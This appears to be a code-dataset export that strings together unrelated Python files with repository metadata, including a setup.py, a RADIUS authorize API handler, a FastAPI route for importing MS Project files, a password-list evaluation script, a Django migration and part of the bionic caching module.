"BSD-3-Clause"
] | 33
|
2015-11-23T01:11:33.000Z
|
2021-04-15T04:23:15.000Z
|
setup.py
|
rahulpshah/nbexamples
|
b14421ef9a88828b5a0e76d376043ee0f13f9da8
|
[
"BSD-3-Clause"
] | 28
|
2015-11-24T18:49:33.000Z
|
2021-12-28T16:48:55.000Z
|
import versioneer
from setuptools import setup
setup_args = dict(
name='nbexamples',
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
license='BSD',
platforms=['Jupyter Notebook'],
packages=[
'nbexamples'
],
include_package_data=True,
install_requires=[
'notebook>=4.2.0',
'nbconvert',
'nbformat'
]
)
if __name__ == '__main__':
setup(**setup_args)
| 19.434783
| 39
| 0.626398
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 95
| 0.212528
|
af7b67f1e4cd5fbb564b9808cb8df8c219c0b7fc
| 702
|
py
|
Python
|
toughradius/manage/api/v1/api_authorize.py
|
geosson/GSRadius
|
5870e3d055e8366f98b8e65220a1520b5da22f6d
|
[
"Apache-2.0"
] | 1
|
2019-05-12T15:06:58.000Z
|
2019-05-12T15:06:58.000Z
|
toughradius/manage/api/v1/api_authorize.py
|
geosson/GSRadius
|
5870e3d055e8366f98b8e65220a1520b5da22f6d
|
[
"Apache-2.0"
] | null | null | null |
toughradius/manage/api/v1/api_authorize.py
|
geosson/GSRadius
|
5870e3d055e8366f98b8e65220a1520b5da22f6d
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
#coding=utf-8
from toughlib import utils, apiutils
from toughlib.permit import permit
from toughradius.manage.api.apibase import ApiHandler
from toughradius.manage import models
from toughradius.manage.radius.radius_authorize import RadiusAuth
@permit.route(r"/api/v1/authorize")
class AuthorizeHandler(ApiHandler):
def post(self):
try:
req_msg = self.parse_request()
app = self.application
auth = RadiusAuth(app.db_engine,app.mcache,app.aes,req_msg)
self.render_result(**auth.authorize())
except Exception as err:
return self.render_result(code=1,msg=utils.safeunicode(err.message))
| 31.909091
| 80
| 0.702279
| 384
| 0.547009
| 0
| 0
| 420
| 0.598291
| 0
| 0
| 54
| 0.076923
|
af7bf1efb310882137ab2c2a20b32d59f0f8b898
| 89
|
py
|
Python
|
mergics/apps.py
|
nim65s/mergics
|
253b7414d3bcf03078c62b2c58abec8f4b0b9722
|
[
"BSD-2-Clause"
] | null | null | null |
mergics/apps.py
|
nim65s/mergics
|
253b7414d3bcf03078c62b2c58abec8f4b0b9722
|
[
"BSD-2-Clause"
] | 1
|
2020-10-06T20:03:20.000Z
|
2020-10-06T20:27:03.000Z
|
mergics/apps.py
|
nim65s/mergics
|
253b7414d3bcf03078c62b2c58abec8f4b0b9722
|
[
"BSD-2-Clause"
] | null | null | null |
from django.apps import AppConfig
class MergicsConfig(AppConfig):
name = 'mergics'
| 14.833333
| 33
| 0.752809
| 52
| 0.58427
| 0
| 0
| 0
| 0
| 0
| 0
| 9
| 0.101124
|
af7e5e86d0f60de6b492ec7b6eafdc2ebea4c16a
| 6,336
|
py
|
Python
|
project-management-api/app/routers/msprojects.py
|
paolo-demagistris-polito/pm-lab-polito-EnvForDigitalProjectDelivery
|
07e121a6613398bf3a8fbb9ec6831720bfcf2c33
|
[
"MIT"
] | 1
|
2022-03-03T14:22:47.000Z
|
2022-03-03T14:22:47.000Z
|
project-management-api/app/routers/msprojects.py
|
paolo-demagistris-polito/pm-lab-polito-EnvForDigitalProjectDelivery
|
07e121a6613398bf3a8fbb9ec6831720bfcf2c33
|
[
"MIT"
] | 3
|
2022-01-20T05:22:52.000Z
|
2022-01-28T09:34:19.000Z
|
project-management-api/app/routers/msprojects.py
|
pm-lab-polito/EnvForDigitalProjectDelivery
|
0bda402f70160eccb8959ffac3d9baeccce60781
|
[
"MIT"
] | null | null | null |
"""
Module for the methods regarding ms projects
"""
import jpype
import jsonpath_ng.ext
import mpxj
from fastapi import APIRouter, File, UploadFile
from datatypes.models import *
from dependencies import *
router = APIRouter(
prefix="/msprojects",
tags=["msprojects"],
dependencies=[]
)
@router.post("/",
dependencies=[Depends(require_project_permission(Permissions.edit))])
async def add_ms_file_to_project(file: UploadFile = File(...),
user: User = Depends(get_current_active_user),
db_project: Project = Depends(get_project),
session: Session = Depends(get_session)):
"""
    Add an MS Project file to a project
:param file: ms file to upload
:param user: current authenticated user
:param db_project: project to add the file to
:param session: session to use
:return: uploaded ms project
"""
if not file.filename.endswith(".mpp"):
raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail="File is not a ms project")
file_name = file.filename.split(".")[0]
content = await file.read()
jpype.startJVM()
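    # mpxj is a Java library; the Java-side import below only resolves while the
    # JVM started by jpype.startJVM() above is running.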
from net.sf.mpxj.reader import UniversalProjectReader
project = UniversalProjectReader().read(jpype.java.io.ByteArrayInputStream(content))
tasks = []
for task in project.getTasks():
db_task = dict()
db_task["name"] = str(task.getName().toString())
db_task["level"] = task.getOutlineLevel()
db_task["duration"] = str(task.getDuration().toString())
db_task["predecessors"] = list()
db_task["ef"] = str(task.getEarlyFinish().toString())
db_task["es"] = str(task.getEarlyStart().toString())
db_task["lf"] = str(task.getLateFinish().toString())
db_task["ls"] = str(task.getLateStart().toString())
db_task["start"] = str(task.getStart().toString())
db_task["finish"] = str(task.getFinish().toString())
db_task["cost"] = str(task.getCost().toString())
db_task["id"] = str(task.getID().toString())
for rel in task.getPredecessors():
db_pred = dict()
db_pred["target_task"] = str(rel.getTargetTask().getName().toString())
db_pred["target_task_id"] = str(rel.getTargetTask().getID().toString())
db_pred["lag"] = str(rel.getLag().toString())
db_pred["type"] = str(rel.getType().toString())
db_task["predecessors"].append(db_pred)
tasks.append(db_task)
resources = []
for res in project.getResources():
if res.getName() is not None and res.getName() != "":
db_res = dict()
db_res["name"] = str(res.getName().toString())
db_res["id"] = str(res.getID().toString())
resources.append(db_res)
project_properties = project.getProjectProperties()
proj_info = dict()
if project_properties.getStartDate() is not None:
proj_info["baseline_start"] = str(project_properties.getStartDate().toString())
if project_properties.getActualStart() is not None:
proj_info["actual_start"] = str(project_properties.getActualStart().toString())
if project_properties.getFinishDate() is not None:
proj_info["baseline_finish"] = str(project_properties.getFinishDate().toString())
if project_properties.getActualFinish() is not None:
proj_info["actual_finish"] = str(project_properties.getActualFinish().toString())
if project_properties.getBaselineDuration() is not None:
proj_info["baseline_duration"] = str(project_properties.getBaselineDuration().toString())
if project_properties.getActualDuration() is not None:
proj_info["actual_duration"] = str(project_properties.getActualDuration().toString())
if project_properties.getCurrencySymbol() is not None:
proj_info["currency_code"] = str(project_properties.getCurrencyCode().toString())
tmp = crud.get_ms_project(session, db_project.project_name, file_name)
if tmp is not None:
db_msproj = tmp
else:
db_msproj = MSProject(project_name=db_project.project_name,
ms_project_name=file_name,
author_name=user.user_name)
db_msproj.update_author_name = user.user_name
db_msproj.tasks = tasks
db_msproj.resources = resources
db_msproj.proj_info = proj_info
session.add(db_msproj)
session.commit()
session.refresh(db_msproj)
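    # Re-evaluate every stored JSONPath "computed field" against the freshly
    # imported tasks / resources / project info.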
for computed_field in db_msproj.computed_fields_reference:
jsonpath_expr = jsonpath_ng.ext.parse(computed_field.jsonpath)
match computed_field.field_from:
case MSProjectField.tasks:
computed_field.field_value = list(map(lambda a: a.value, jsonpath_expr.find(db_msproj.tasks)))
case MSProjectField.resources:
computed_field.field_value = list(map(lambda a: a.value, jsonpath_expr.find(db_msproj.resources)))
case MSProjectField.proj_info:
computed_field.field_value = list(map(lambda a: a.value, jsonpath_expr.find(db_msproj.proj_info)))
session.add(computed_field)
session.add(db_msproj)
session.commit()
session.refresh(db_msproj)
jpype.shutdownJVM()
return db_msproj
@router.get("/{ms_project_name}",
dependencies=[Depends(require_project_permission(Permissions.view))])
async def get_ms_file_of_project(db_ms_project: MSProject = Depends(get_ms_project)):
"""
Get ms file of a project
:param db_ms_project: ms project from dependencies
:return: ms project if found, 404 otherwise
"""
return db_ms_project
@router.delete("/{ms_project_name}",
dependencies=[Depends(require_project_permission(Permissions.edit))])
async def delete_ms_file_of_project(db_ms_project: MSProject = Depends(get_ms_project),
session: Session = Depends(get_session)):
"""
Delete ms file of a project
:param db_ms_project: ms project from dependencies
:param session: session from dependencies
:return: 200 ok if deleted, 404 if not found
"""
session.delete(db_ms_project)
session.commit()
raise HTTPException(status_code=200, detail="OK")
| 37.94012
| 114
| 0.665404
| 0
| 0
| 0
| 0
| 6,024
| 0.950758
| 5,686
| 0.897412
| 1,029
| 0.162405
|
af7fc4668b2fb86b2672d51501af6b7ccc59aa58
| 1,945
|
py
|
Python
|
evaluation/novel_base_word_comparison.py
|
Knuust/Semantic-Password-Generator
|
d10b8bd3f5871359efae6e046aac76cd22868680
|
[
"BSD-3-Clause"
] | null | null | null |
evaluation/novel_base_word_comparison.py
|
Knuust/Semantic-Password-Generator
|
d10b8bd3f5871359efae6e046aac76cd22868680
|
[
"BSD-3-Clause"
] | null | null | null |
evaluation/novel_base_word_comparison.py
|
Knuust/Semantic-Password-Generator
|
d10b8bd3f5871359efae6e046aac76cd22868680
|
[
"BSD-3-Clause"
] | 1
|
2022-02-23T13:48:34.000Z
|
2022-02-23T13:48:34.000Z
|
import pickle
import matplotlib.pyplot as plt
from matplotlib_venn import venn3
test_list_path = 'final/wörterbücher/'
password_list_path = 'final/generated_password_lists/'
def remove_duplicates(seq):
seen = set()
seen_add = seen.add
return [x for x in seq if not (x in seen or seen_add(x))]
def load_password_list(file_name):
file = open(file_name + '.txt', "r", encoding='latin1')
password_list = [line.rstrip() for line in file.readlines()]
return password_list
test_set = load_password_list(test_list_path + 'test')
train_words = pickle.load(open('train_words_real.pkl', 'rb'))
test_words = pickle.load(open('test_words_real.pkl', 'rb'))
novel_test_words = set(test_words).difference(train_words)
test_novel_passwords = []
low_test_words = [word.lower() for word in novel_test_words]
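# Keep only test-set passwords that contain at least one base word never seen in training.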
for password in test_set:
flag = False
for word in low_test_words:
if word in password.lower():
flag = True
break
if flag:
test_novel_passwords.append(password)
spg_suggestions = load_password_list(password_list_path + 'spg_with_numbers_50M')
pcfg_suggestions = remove_duplicates(load_password_list(password_list_path + 'pcfg_50M'))[:50000000]
methods = {}
methods['spg'] = set(spg_suggestions).intersection(test_novel_passwords)
methods['pcfg'] = set(pcfg_suggestions).intersection(test_novel_passwords)
results = {}
for key in methods.keys():
results[key] = len(methods[key])
print(results)
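# Count passwords recovered only by `method` and by no other method.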
def find_exclusive_passwords(method):
return len(set(methods[method]).difference(set().union(*[value for key, value in methods.items() if key != method])))
exclusive = {}
for key in methods.keys():
exclusive[key] = find_exclusive_passwords(key)
print(exclusive)
set1 = set(methods['spg'])
set2 = set(methods['pcfg'])
set3 = set(test_novel_passwords)
venn3([set1, set2, set3], ('SeePass', 'PCFG', 'Test'))
plt.savefig('sepass_pcfg_test_venn_real.png')
| 29.029851
| 123
| 0.728021
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 237
| 0.121726
|
af808a47b333d62757233f327d638f9ef66a62b6
| 563
|
py
|
Python
|
Leetcode/1000-2000/1103. Distribute Candies to People/1103.py
|
Next-Gen-UI/Code-Dynamics
|
a9b9d5e3f27e870b3e030c75a1060d88292de01c
|
[
"MIT"
] | null | null | null |
Leetcode/1000-2000/1103. Distribute Candies to People/1103.py
|
Next-Gen-UI/Code-Dynamics
|
a9b9d5e3f27e870b3e030c75a1060d88292de01c
|
[
"MIT"
] | null | null | null |
Leetcode/1000-2000/1103. Distribute Candies to People/1103.py
|
Next-Gen-UI/Code-Dynamics
|
a9b9d5e3f27e870b3e030c75a1060d88292de01c
|
[
"MIT"
] | null | null | null |
class Solution:
def distributeCandies(self, candies: int, n: int) -> List[int]:
ans = [0] * n
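    # After r complete rounds, person i (1-indexed) has received r*i + n*r*(r-1)/2
    # candies, so the total handed out is (n^2*r^2 + n*r) / 2. Solving that
    # quadratic for the largest r whose total fits in `candies` gives `rows`.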
rows = int((-n + (n**2 + 8 * n**2 * candies)**0.5) / (2 * n**2))
accumN = rows * (rows - 1) * n // 2
for i in range(n):
ans[i] = accumN + rows * (i + 1)
givenCandies = (n**2 * rows**2 + n * rows) // 2
candies -= givenCandies
lastGiven = rows * n
i = 0
while candies > 0:
lastGiven += 1
actualGiven = min(lastGiven, candies)
candies -= actualGiven
ans[i] += actualGiven
i += 1
return ans
| 24.478261
| 68
| 0.515098
| 562
| 0.998224
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
af814a1fa869942dd97f9544736806c049599941
| 1,810
|
py
|
Python
|
projects/migrations/0086_auto_20201202_0818.py
|
SuviVappula/kaavapino
|
0e3687c94afff10527c9bee9627fc30bd2dfab4f
|
[
"MIT"
] | 3
|
2019-02-07T14:47:00.000Z
|
2022-02-15T14:09:38.000Z
|
projects/migrations/0086_auto_20201202_0818.py
|
SuviVappula/kaavapino
|
0e3687c94afff10527c9bee9627fc30bd2dfab4f
|
[
"MIT"
] | 74
|
2017-12-13T09:18:04.000Z
|
2022-03-11T23:29:59.000Z
|
projects/migrations/0086_auto_20201202_0818.py
|
SuviVappula/kaavapino
|
0e3687c94afff10527c9bee9627fc30bd2dfab4f
|
[
"MIT"
] | 8
|
2017-12-13T09:31:20.000Z
|
2022-02-15T13:10:34.000Z
|
# Generated by Django 2.2.13 on 2020-12-02 06:18
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('projects', '0085_auto_20201201_1705'),
]
operations = [
migrations.CreateModel(
name='ProjectPhaseDeadlineSectionAttribute',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('index', models.PositiveIntegerField(default=0, verbose_name='index')),
('attribute', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='projects.Attribute', verbose_name='attribute')),
],
options={
'verbose_name': 'project phase deadline section item',
'verbose_name_plural': 'project phase deadline section items',
'ordering': ('index',),
},
),
migrations.RemoveField(
model_name='projectphasedeadlinesection',
name='deadlines',
),
migrations.DeleteModel(
name='ProjectPhaseSectionDeadline',
),
migrations.AddField(
model_name='projectphasedeadlinesectionattribute',
name='section',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='projects.ProjectPhaseDeadlineSection', verbose_name='deadline phase section'),
),
migrations.AddField(
model_name='projectphasedeadlinesection',
name='attributes',
field=models.ManyToManyField(related_name='phase_deadline_sections', through='projects.ProjectPhaseDeadlineSectionAttribute', to='projects.Attribute', verbose_name='attributes'),
),
]
| 40.222222
| 190
| 0.633702
| 1,683
| 0.929834
| 0
| 0
| 0
| 0
| 0
| 0
| 635
| 0.350829
|
af815fbf98829714e6eda7b837a98b8d597117ab
| 38,711
|
py
|
Python
|
bionic/persistence.py
|
baxen/bionic
|
f722a72e9571b81f537ed51fcf15bc964a928024
|
[
"Apache-2.0"
] | null | null | null |
bionic/persistence.py
|
baxen/bionic
|
f722a72e9571b81f537ed51fcf15bc964a928024
|
[
"Apache-2.0"
] | null | null | null |
bionic/persistence.py
|
baxen/bionic
|
f722a72e9571b81f537ed51fcf15bc964a928024
|
[
"Apache-2.0"
] | null | null | null |
"""
This module provides local and cloud storage of computed values. The main
point of entry is the PersistentCache, which encapsulates this functionality.
"""
import attr
import os
import shutil
import tempfile
import yaml
import warnings
from uuid import uuid4
from pathlib import Path
from bionic.exception import EntitySerializationError, UnsupportedSerializedValueError
from .datatypes import Result
from .gcs import GcsTool
from .utils.files import (
ensure_dir_exists,
ensure_parent_dir_exists,
recursively_copy_path,
)
from .utils.misc import hash_simple_obj_to_hex, oneline
from .utils.urls import (
derelativize_url,
path_from_url,
relativize_url,
url_from_path,
)
from .tokenization import tokenize
import logging
logger = logging.getLogger(__name__)
try:
# The C-based YAML emitter is much faster, but requires separate bindings
# which may not be installed.
YamlDumper = yaml.CDumper
YamlLoader = yaml.CLoader
except AttributeError:
running_under_readthedocs = os.environ.get("READTHEDOCS") == "True"
if not running_under_readthedocs:
warnings.warn(
oneline(
"""
Failed to find LibYAML bindings;
falling back to slower Python implementation.
This may reduce performance on large flows.
Installing LibYAML should resolve this."""
)
)
YamlDumper = yaml.Dumper
YamlLoader = yaml.Loader
class PersistentCache:
"""
Provides a persistent mapping between Queries (things we could compute) and
saved Results (computed Queries). You use it by getting a CacheAccessor
for your specific query, and then performing load/save operations on the
accessor.
When looking up a Query, the cache searches for a saved artifact with a
matching Query. The Query may not match exactly: each Query contains a
Provenance, which represents all the code and data used to compute a value,
and two Provenances can match at different levels of precision, from a
"functional" match to an "exact" one. A functional match is sufficient to
treat two artifacts as interchangeable; the finer levels of matching are
only used by the "assisted versioning" system, which tries to detect
situations where a function's bytecode has changed but its version hasn't.
The cache has two tiers: a "local" tier on disk, which is cheap to access,
and an optional "cloud" tier backed by GCS, which is more expensive to
access (but globally accessible). For load operations, the cache returns
the cheapest artifact that functionally matches the Query. For save
operations, the cache records an exact entry in both tiers.
The cache actually has two distinct responsibilities: (a) translating
between in-memory Python objects and serialized files or blobs, and (b)
maintaining an "inventory" of these files and blobs. Currently it makes
sense to group these responsibilities together at each tier, where the
local inventory tracks the local files and the cloud inventory tracks the
cloud blobs. Each of these tiers is handled by a "store" class. However,
in the future we may have other types of persistent artifacts (like
database tables) which don't have their own inventory type. In this case
we might want to split these responsibilities out.
"""
def __init__(self, local_store, cloud_store):
self._local_store = local_store
self._cloud_store = cloud_store
def get_accessor(self, query):
return CacheAccessor(self, query)
class CacheAccessor:
"""
Provides a reference to the cache entries for a specific query. This
interface is convenient, and it also allows us to maintain some memoized
state for each query, saving redundant lookups.
"""
def __init__(self, parent_cache, query):
self.query = query
self.value_filename_stem = valid_filename_from_query(self.query) + "."
self._local = parent_cache._local_store
self._cloud = parent_cache._cloud_store
# These values are memoized to avoid roundtrips.
self._stored_local_entry = None
self._stored_cloud_entry = None
def flush_stored_entries(self):
"""
Flushes the stored local and cloud cached entries.
"""
self._stored_local_entry = None
self._stored_cloud_entry = None
def can_load(self):
"""
Indicates whether there are any cached artifacts for this query.
"""
try:
return self._get_nearest_entry_with_artifact() is not None
except InternalCacheStateError as e:
self._raise_state_error_with_explanation(e)
def load_provenance(self):
"""
Returns the provenance of the nearest cached artifact for this query,
if one exists.
"""
try:
entry = self._get_nearest_entry_with_artifact()
if entry is None:
return None
return entry.provenance
except InternalCacheStateError as e:
self._raise_state_error_with_explanation(e)
def load_result(self):
"""
Returns a Result for the nearest cached artifact for this query, if one
exists.
"""
try:
entry = self._get_nearest_entry_with_artifact()
if entry is None:
return None
if entry.tier == "local":
file_path = path_from_url(entry.artifact_url)
elif entry.tier == "cloud":
blob_url = entry.artifact_url
file_path = self._file_from_blob(blob_url)
else:
raise AssertionError("Unrecognized tier: " + entry.tier)
value = self._value_from_file(file_path)
value_hash = self.query.protocol.tokenize_file(file_path)
return Result(
query=self.query,
value=value,
file_path=file_path,
value_hash=value_hash,
)
except InternalCacheStateError as e:
self._raise_state_error_with_explanation(e)
def load_result_value_hash(self):
"""
Returns only the value hash for the nearest cached artifact for
this query, if one exists.
"""
try:
entry = self._get_nearest_entry_with_artifact()
if entry is None:
return None
return entry.value_hash
except InternalCacheStateError as e:
self._raise_state_error_with_explanation(e)
def save_result(self, result):
"""
Saves a Result in each cache layer that doesn't already have an exact
match.
"""
try:
self._save_or_reregister_result(result)
except InternalCacheStateError as e:
self._raise_state_error_with_explanation(e)
def update_provenance(self):
"""
Adds an entry to each cache layer that doesn't already have an exact
match for this query. There must be already be at least one cached
functional match -- i.e., ``can_load()`` must already return True.
"""
try:
self._save_or_reregister_result(None)
except InternalCacheStateError as e:
self._raise_state_error_with_explanation(e)
def _save_or_reregister_result(self, result):
local_entry = self._get_local_entry()
cloud_entry = self._get_cloud_entry()
self.flush_stored_entries()
if result is not None:
value_wrapper = NullableWrapper(result.value)
file_path = result.file_path
value_hash = result.value_hash
else:
value_wrapper = None
file_path = None
value_hash = None
blob_url = None
if file_path is None:
if local_entry.has_artifact:
file_path = path_from_url(local_entry.artifact_url)
value_hash = local_entry.value_hash
elif value_wrapper is not None:
file_path = self._file_from_value(value_wrapper.value)
value_hash = self.query.protocol.tokenize_file(file_path)
else:
if cloud_entry is None or not cloud_entry.has_artifact:
raise AssertionError(
oneline(
"""
Attempted to register metadata with no result
argument and no previously saved values;
this suggests we called update_provenance() without
previously finding a cached value, which shouldn't
happen."""
)
)
blob_url = cloud_entry.artifact_url
file_path = self._file_from_blob(blob_url)
value_hash = cloud_entry.value_hash
if not local_entry.exactly_matches_query:
file_url = url_from_path(file_path)
local_entry = self._local.inventory.register_url(
self.query, file_url, value_hash,
)
self._stored_local_entry = local_entry
if self._cloud:
assert cloud_entry is not None
if not cloud_entry.exactly_matches_query:
if blob_url is None:
if cloud_entry.has_artifact:
blob_url = cloud_entry.artifact_url
else:
blob_url = self._blob_from_file(file_path)
cloud_entry = self._cloud.inventory.register_url(
self.query, blob_url, value_hash,
)
self._stored_cloud_entry = cloud_entry
def _get_nearest_entry_with_artifact(self):
"""
Returns the "nearest" -- i.e., most local -- cache entry for this
query.
"""
local_entry = self._get_local_entry()
if local_entry.has_artifact:
return local_entry
cloud_entry = self._get_cloud_entry()
if cloud_entry is not None and cloud_entry.has_artifact:
return cloud_entry
return None
def _get_local_entry(self):
if self._stored_local_entry is None:
self._stored_local_entry = self._local.inventory.find_entry(self.query)
return self._stored_local_entry
def _get_cloud_entry(self):
if self._stored_cloud_entry is None:
if self._cloud is None:
return None
self._stored_cloud_entry = self._cloud.inventory.find_entry(self.query)
return self._stored_cloud_entry
def _file_from_blob(self, blob_url):
dir_path = self._local.generate_unique_dir_path(self.query)
filename = path_from_url(blob_url).name
file_path = dir_path / filename
ensure_parent_dir_exists(file_path)
logger.info("Downloading %s from GCS ...", self.query.task_key)
try:
self._cloud.download(file_path, blob_url)
except Exception as e:
raise InternalCacheStateError.from_failure("artifact blob", blob_url, e)
return file_path
def _blob_from_file(self, file_path):
url_prefix = self._cloud.generate_unique_url_prefix(self.query)
blob_url = url_prefix + "/" + file_path.name
logger.info("Uploading %s to GCS ...", self.query.task_key)
try:
self._cloud.upload(file_path, blob_url)
except Exception as e:
raise InternalCacheStateError.from_failure("artifact file", file_path, e)
return blob_url
def _file_from_value(self, value):
dir_path = self._local.generate_unique_dir_path(self.query)
extension = self.query.protocol.file_extension_for_value(value)
value_filename = self.value_filename_stem + extension
value_path = dir_path / value_filename
ensure_parent_dir_exists(value_path)
try:
self.query.protocol.write(value, value_path)
except Exception as e:
# TODO Should we rename this to just SerializationError?
raise EntitySerializationError(
oneline(
f"""
Value of descriptor {self.query.dnode.to_descriptor()!r}
could not be serialized to disk
"""
)
) from e
return value_path
def _value_from_file(self, file_path):
value_filename = file_path.name
extension = value_filename[len(self.value_filename_stem) :]
try:
return self.query.protocol.read_with_extension(file_path, extension)
except UnsupportedSerializedValueError:
raise
except Exception as e:
raise InternalCacheStateError.from_failure("artifact file", file_path, e)
def _raise_state_error_with_explanation(self, source_exc):
stores = [self._local]
if self._cloud:
stores.append(self._cloud)
inventory_root_urls = " and ".join(store.inventory.root_url for store in stores)
raise InvalidCacheStateError(
oneline(
f"""
Cached data may be in an invalid state; this should be
impossible but could have resulted from either a bug or a
change to the cached files. You should be able to repair
the problem by removing all cached files under
{inventory_root_urls}."""
)
) from source_exc
@attr.s(frozen=True)
class NullableWrapper:
"""
A simple wrapper for a value that might be None. We use this when we want
to distinguish between "we have a value which is None" from "we don't have a
value".
"""
value = attr.ib()
@attr.s(frozen=True)
class InventoryEntry:
"""
Represents a saved artifact tracked by an Inventory; returned by Inventory
to CacheAccessor.
"""
tier = attr.ib()
has_artifact = attr.ib()
artifact_url = attr.ib()
provenance = attr.ib()
exactly_matches_query = attr.ib()
value_hash = attr.ib()
@attr.s(frozen=True)
class MetadataMatch:
"""
Represents a match between a query and a saved artifact. `level` is a string
describing the match level, ranging from "functional" to "exact".
"""
metadata_url = attr.ib()
level = attr.ib()
# TODO Should we merge this with InventoryEntry?
@attr.s(frozen=True)
class ExternalCacheItem:
"""
Represents an inventory entry, but contains data intended to be exposed to users
via the Cache class.
"""
inventory = attr.ib()
abs_artifact_url = attr.ib()
abs_metadata_url = attr.ib()
descriptor = attr.ib()
class Inventory:
"""
Maintains a persistent mapping from Queries to artifact URLs. An Inventory
is backed by a "file system", which could correspond to either a local disk
or a cloud storage service. This file system is used to store
metadata records, each of which describes a Query and an artifact URL that
satisfies it. Metadata records are stored using a hierarchical naming
scheme whose levels correspond to the different levels of Provenance
matching.
"""
def __init__(self, name, tier, filesystem):
self.name = name
self.tier = tier
self._fs = filesystem
self.root_url = filesystem.root_url
def register_url(self, query, url, value_hash):
"""
Records metadata indicating that the provided Query is satisfied
by the provided URL, and returns a corresponding InventoryEntry.
"""
logger.debug(
"In %s inventory for %r, saving artifact URL %s ...",
self.tier,
query,
url,
)
expected_metadata_url = self._exact_metadata_url_for_query(query)
metadata_record = None
if self._fs.exists(expected_metadata_url):
# This shouldn't happen, because the CacheAccessor shouldn't write
# to this inventory if we already have an exact match.
logger.warn(
"In %s cache, attempted to create duplicate entry mapping %r " "to %s",
self.tier,
query,
url,
)
metadata_record = self._load_metadata_if_valid_else_delete(
expected_metadata_url,
)
if metadata_record is None:
metadata_url, metadata_record = self._create_and_write_metadata(
query, url, value_hash,
)
assert metadata_url == expected_metadata_url
logger.debug(
"... in %s inventory for %r, created metadata record at %s",
self.tier,
query,
metadata_url,
)
return InventoryEntry(
tier=self.tier,
has_artifact=True,
artifact_url=url,
provenance=metadata_record.provenance,
exactly_matches_query=True,
value_hash=metadata_record.value_hash,
)
def find_entry(self, query):
"""
Returns an InventoryEntry describing the closest match to the provided
Query.
"""
logger.debug("In %s inventory for %r, searching ...", self.tier, query)
n_prior_attempts = 0
while True:
if n_prior_attempts in (10, 100, 1000, 10000, 100000, 1000000):
message = f"""
While searching in the {self.tier} cache for an entry matching
{query!r}, found {n_prior_attempts} invalid metadata files;
either a lot of artifact files were manually deleted,
or there's a bug in the cache code
"""
if n_prior_attempts == 1000000:
raise AssertionError("Giving up: " + oneline(message))
else:
logger.warn(oneline(message))
n_prior_attempts += 1
match = self._find_best_match(query)
if not match:
logger.debug(
"... in %s inventory for %r, found no match", self.tier, query
)
return InventoryEntry(
tier=self.tier,
has_artifact=False,
artifact_url=None,
provenance=None,
exactly_matches_query=False,
value_hash=None,
)
metadata_record = self._load_metadata_if_valid_else_delete(
match.metadata_url
)
if metadata_record is None:
continue
logger.debug(
"... in %s inventory for %r, found %s match at %s",
self.tier,
query,
match.level,
match.metadata_url,
)
return InventoryEntry(
tier=self.tier,
has_artifact=True,
artifact_url=metadata_record.artifact_url,
provenance=metadata_record.provenance,
exactly_matches_query=(match.level == "exact"),
value_hash=metadata_record.value_hash,
)
def list_items(self):
metadata_urls = [
url for url in self._fs.search(self.root_url) if url.endswith(".yaml")
]
for metadata_url in metadata_urls:
metadata_record = self._load_metadata_if_valid_else_delete(metadata_url)
if metadata_record is None:
continue
artifact_url = metadata_record.artifact_url
yield ExternalCacheItem(
inventory=self,
abs_artifact_url=derelativize_url(artifact_url, metadata_url),
abs_metadata_url=metadata_url,
descriptor=metadata_record.descriptor,
)
def delete_url(self, url):
return self._fs.delete(url)
def _find_best_match(self, query):
equivalent_url_prefix = self._equivalent_metadata_url_prefix_for_query(query)
possible_urls = self._fs.search(equivalent_url_prefix)
equivalent_urls = [url for url in possible_urls if url.endswith(".yaml")]
if len(equivalent_urls) == 0:
return None
exact_url = self._exact_metadata_url_for_query(query)
if exact_url in equivalent_urls:
return MetadataMatch(metadata_url=exact_url, level="exact",)
samecode_url_prefix = self._samecode_metadata_url_prefix_for_query(query)
samecode_urls = [
url for url in equivalent_urls if url.startswith(samecode_url_prefix)
]
if len(samecode_urls) > 0:
return MetadataMatch(metadata_url=samecode_urls[0], level="samecode",)
nominal_url_prefix = self._nominal_metadata_url_prefix_for_query(query)
nominal_urls = [
url for url in equivalent_urls if url.startswith(nominal_url_prefix)
]
if len(nominal_urls) > 0:
return MetadataMatch(metadata_url=nominal_urls[0], level="nominal",)
return MetadataMatch(metadata_url=equivalent_urls[0], level="equivalent",)
def _equivalent_metadata_url_prefix_for_query(self, query):
return (
self._fs.root_url
+ "/"
+ valid_filename_from_query(query)
+ "/"
+ query.provenance.functional_hash
)
def _nominal_metadata_url_prefix_for_query(self, query):
minor_version_token = tokenize(query.provenance.code_version_minor)
return (
self._equivalent_metadata_url_prefix_for_query(query)
+ "/"
+ "mv_"
+ minor_version_token
)
def _samecode_metadata_url_prefix_for_query(self, query):
return (
self._nominal_metadata_url_prefix_for_query(query)
+ "/"
+ "bc_"
+ query.provenance.bytecode_hash
)
def _exact_metadata_url_for_query(self, query):
filename = f"metadata_{query.provenance.exact_hash}.yaml"
return self._nominal_metadata_url_prefix_for_query(query) + "/" + filename
def _load_metadata_if_valid_else_delete(self, url):
try:
metadata_yaml = self._fs.read_bytes(url).decode("utf8")
metadata_record = ArtifactMetadataRecord.from_yaml(metadata_yaml, url)
except Exception as e:
raise InternalCacheStateError.from_failure("metadata record", url, e)
if not self._fs.exists(metadata_record.artifact_url):
logger.info(
"Found invalid metadata record at %s, "
"referring to nonexistent artifact at %s; "
"deleting metadata record",
url,
metadata_record.artifact_url,
)
self.delete_url(url)
return None
else:
return metadata_record
def _create_and_write_metadata(self, query, artifact_url, value_hash):
metadata_url = self._exact_metadata_url_for_query(query)
metadata_record = ArtifactMetadataRecord.from_content(
dnode=query.dnode,
artifact_url=artifact_url,
provenance=query.provenance,
metadata_url=metadata_url,
value_hash=value_hash,
)
self._fs.write_bytes(metadata_record.to_yaml().encode("utf8"), metadata_url)
return metadata_url, metadata_record
class LocalStore:
"""
Represents the local disk cache. Provides both an Inventory that manages
artifact (file) URLs, and a method to generate those URLs (for creating
new files).
"""
